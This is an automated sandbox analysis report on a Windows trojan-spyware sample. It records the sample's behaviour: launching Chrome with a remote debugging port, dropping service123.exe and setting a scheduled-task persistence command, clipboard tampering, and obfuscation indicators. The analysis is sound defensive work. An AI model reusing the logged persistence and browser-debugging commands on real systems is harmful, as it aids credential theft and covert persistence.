Source: chrome.exe, 00000004.00000002.2171986297.0000162400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172177495.0000162400E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172148879.0000162400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172122029.0000162400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2153464619.0000162400A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000004.00000002.2170048243.0000162400B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172122029.0000162400E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000004.00000002.2172177495.0000162400E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172148879.0000162400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166740014.00001624002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172122029.0000162400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2153464619.0000162400A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000004.00000002.2172148879.0000162400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166740014.00001624002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172122029.0000162400E48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000004.00000002.2172148879.0000162400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172122029.0000162400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2153464619.0000162400A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000004.00000002.2171986297.0000162400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172177495.0000162400E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172122029.0000162400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2153464619.0000162400A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000004.00000002.2171986297.0000162400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172148879.0000162400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2172122029.0000162400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2153464619.0000162400A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000004.00000002.2167437230.00001624004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000004.00000002.2169504950.00001624009C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.2169504950.00001624009C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000002.2165933939.000016240009C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.2165970504.00001624000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.2166466375.00001624001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000002.2167437230.00001624004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168958442.0000162400820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168991511.0000162400834000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2167437230.00001624004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168958442.0000162400820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168991511.0000162400834000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000002.2169702023.0000162400A3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.2166466375.00001624001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000003.2151473579.0000162400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2153512107.0000162400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167294103.0000162400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2165527680.0000162400014000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000002.2168211289.00001624006D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2169028626.0000162400858000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2169132203.00001624008A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169443068.0000162400994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166466375.00001624001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2169132203.00001624008A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2169443068.0000162400994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166466375.00001624001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2169314110.000016240092C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2167527583.0000162400524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167678186.0000162400598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2168738388.0000162400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoceType)
Source: chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoresent.
Source: chrome.exe, 00000004.00000002.2166654268.0000162400298000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000004.00000002.2167437230.00001624004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2169776780.0000162400A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2165527680.0000162400014000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2166536498.000016240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2166536498.000016240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2167955215.000016240061C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2166536498.000016240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2166536498.000016240020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2170632895.0000162400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2167437230.00001624004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2166740014.00001624002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2167586946.000016240053C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9D11
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0E9E27

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: AD4q0qFvM8.exe Static PE information: section name:
Source: AD4q0qFvM8.exe Static PE information: section name: .idata
Source: AD4q0qFvM8.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D651B0 8_2_00D651B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D63E20 8_2_00D63E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C112CCE 8_2_6C112CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0DCD00 8_2_6C0DCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0DEE50 8_2_6C0DEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E0FC0 8_2_6C0E0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120AC0 8_2_6C120AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E44F0 8_2_6C0E44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1146E0 8_2_6C1146E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1107D0 8_2_6C1107D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1087C0 8_2_6C1087C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120060 8_2_6C120060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C112090 8_2_6C112090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C102360 8_2_6C102360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12DC70 8_2_6C12DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E5880 8_2_6C0E5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1098F0 8_2_6C1098F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C117A20 8_2_6C117A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11DBEE 8_2_6C11DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11140E 8_2_6C11140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C121510 8_2_6C121510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11F610 8_2_6C11F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FF760 8_2_6C0FF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D3000 8_2_6C0D3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1950D0 8_2_6C1950D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E70C0 8_2_6C0E70C0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C19ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3560 appears 43 times
One or more processes crash
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 1876
Uses 32bit PE files
Source: AD4q0qFvM8.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: AD4q0qFvM8.exe Static PE information: Section: biazzcha ZLIB complexity 0.9942603044557918
Source: AD4q0qFvM8.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/7@16/5
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6708
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2168382751.000016240072C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: AD4q0qFvM8.exe Virustotal: Detection: 69%
Source: AD4q0qFvM8.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\AD4q0qFvM8.exe "C:\Users\user\Desktop\AD4q0qFvM8.exe"
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2404,i,6825449060728649226,8540860588299111,262144 /prefetch:8
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 1876
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2404,i,6825449060728649226,8540860588299111,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll Jump to behavior
Source: AD4q0qFvM8.exe Static file information: File size 4480000 > 1048576
Source: AD4q0qFvM8.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: AD4q0qFvM8.exe Static PE information: Raw size of biazzcha is bigger than: 0x100000 < 0x1bec00
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D68230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00D68230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: AD4q0qFvM8.exe Static PE information: real checksum: 0x454743 should be: 0x44e655
PE file contains sections with non-standard names
Source: AD4q0qFvM8.exe Static PE information: section name:
Source: AD4q0qFvM8.exe Static PE information: section name: .idata
Source: AD4q0qFvM8.exe Static PE information: section name:
Source: AD4q0qFvM8.exe Static PE information: section name: biazzcha
Source: AD4q0qFvM8.exe Static PE information: section name: bdvaplrx
Source: AD4q0qFvM8.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D6A499 push es; iretd 8_2_00D6A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C180C30 push eax; mov dword ptr [esp], edi 8_2_6C180DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C14ED10 push eax; mov dword ptr [esp], ebx 8_2_6C14EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C124E31 push eax; mov dword ptr [esp], ebx 8_2_6C124E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118E7A push edx; mov dword ptr [esp], ebx 8_2_6C118E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A947 push eax; mov dword ptr [esp], ebx 8_2_6C11A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C14EAB0 push eax; mov dword ptr [esp], ebx 8_2_6C14EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120AA2 push eax; mov dword ptr [esp], ebx 8_2_6C120AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C138AA0 push eax; mov dword ptr [esp], ebx 8_2_6C13909F
